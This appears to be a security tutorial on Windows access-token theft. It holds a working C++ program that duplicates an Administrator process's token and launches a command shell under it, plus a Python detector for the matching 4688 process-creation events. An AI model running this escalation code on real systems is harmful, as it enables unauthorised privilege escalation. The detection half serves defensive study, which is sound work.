Create Process with Token

Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with DuplicateToken(Ex) and use it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
Example:
In simple terms, this is when the access token of an account already present in one of the processes running on the victim host is retrieved, duplicated and then used to create a new process.
Step                                                          Win32 API
Open a process with the access token you want to steal        OpenProcess
Get a handle to the access token of that process              OpenProcessToken
Make a duplicate of the access token present in that process  DuplicateTokenEx
Create a new process with the newly acquired access token     CreateProcessWithTokenW
I will weaponize this technique using the following code:
Code:
#include "stdafx.h"
#include <windows.h>
#include <iostream>

int main(int argc, char * argv[]) {
    char a;
    HANDLE processHandle;
    HANDLE tokenHandle = NULL;
    HANDLE duplicateTokenHandle = NULL;
    STARTUPINFO startupInfo;
    PROCESS_INFORMATION processInformation;
    DWORD PID_TO_IMPERSONATE = 3060;          // PID of the target process (notepad in this demo)
    wchar_t cmdline[] = L"C:\\shell.cmd";     // program launched under the duplicated token

    ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
    ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
    startupInfo.cb = sizeof(STARTUPINFO);

    // Step 1: open the target process
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, true, PID_TO_IMPERSONATE);
    // Step 2: get a handle to the access token of that process
    OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &tokenHandle);
    // Step 3: duplicate the token as a primary token
    DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
    // Step 4: create the new process with the duplicated token
    CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL, &startupInfo, &processInformation);

    std::cin >> a;    // keep the console open until a key is entered
    return 0;
}
My target here is notepad, which is running with Administrator privileges and was chosen for demonstration purposes. Compiling and running the previous code uses the API calls listed above to grab the token, duplicate it and open a command prompt with Administrator privileges.
As you can see when running the compiled binary: PowerShell is the parent process of ConsoleApplication, which runs as the user, while the cmd process runs as Administrator.
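From the defender's side, the scenario above leaves a trace in Windows Security event 4688 (process creation): the Subject (creator account) differs from the Target Subject (account of the new process). The following detector is an added example, not code from the original post; the field names follow the 4688 event data, the allow-list of launcher processes is an assumption to tune per environment, and the sample records are constructed to mirror the demonstration.

```python
# Added example: flag 4688 records where a process is started under a
# different, higher-integrity account than its creator, the footprint of
# a process created with a duplicated token.

# Mandatory integrity label SIDs as reported in the 4688 MandatoryLabel field.
INTEGRITY = {
    "S-1-16-4096": 1,   # Low
    "S-1-16-8192": 2,   # Medium
    "S-1-16-12288": 3,  # High
    "S-1-16-16384": 4,  # System
}

# Assumed allow-list of parents that legitimately spawn processes under
# another account (tune for your environment).
KNOWN_LAUNCHERS = {
    r"C:\Windows\System32\services.exe",
    r"C:\Windows\System32\svchost.exe",
}

def is_token_abuse(ev):
    """True when creator and new process run as different accounts, the parent
    is not a known launcher, and the new process is at High/System integrity."""
    if ev["SubjectUserSid"] == ev["TargetUserSid"]:
        return False
    if ev["ParentProcessName"] in KNOWN_LAUNCHERS:
        return False
    return INTEGRITY.get(ev["MandatoryLabel"], 0) >= INTEGRITY["S-1-16-12288"]

def find_token_abuse(events):
    """Return the new-process names of every flagged 4688 record."""
    return [ev["NewProcessName"] for ev in events if is_token_abuse(ev)]

# Constructed sample: PowerShell starts the console app as the user, the
# console app starts cmd.exe as Administrator, svchost starts a service.
SAMPLE_4688 = [
    {"SubjectUserSid": "S-1-5-21-1-2-3-1001", "TargetUserSid": "S-1-5-21-1-2-3-1001",
     "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "NewProcessName": r"C:\Users\user\ConsoleApplication.exe", "MandatoryLabel": "S-1-16-8192"},
    {"SubjectUserSid": "S-1-5-21-1-2-3-1001", "TargetUserSid": "S-1-5-21-1-2-3-500",
     "ParentProcessName": r"C:\Users\user\ConsoleApplication.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "MandatoryLabel": "S-1-16-12288"},
    {"SubjectUserSid": "S-1-5-18", "TargetUserSid": "S-1-5-20",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe",
     "NewProcessName": r"C:\Windows\System32\spoolsv.exe", "MandatoryLabel": "S-1-16-16384"},
]

if __name__ == "__main__":
    print(find_token_abuse(SAMPLE_4688))   # only the cmd.exe record is flagged
```

Command-line auditing must be enabled for 4688 to be logged with these fields, and the launcher allow-list should be built from a baseline of the host's normal service activity.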
[Screenshot: Create a Process with Token]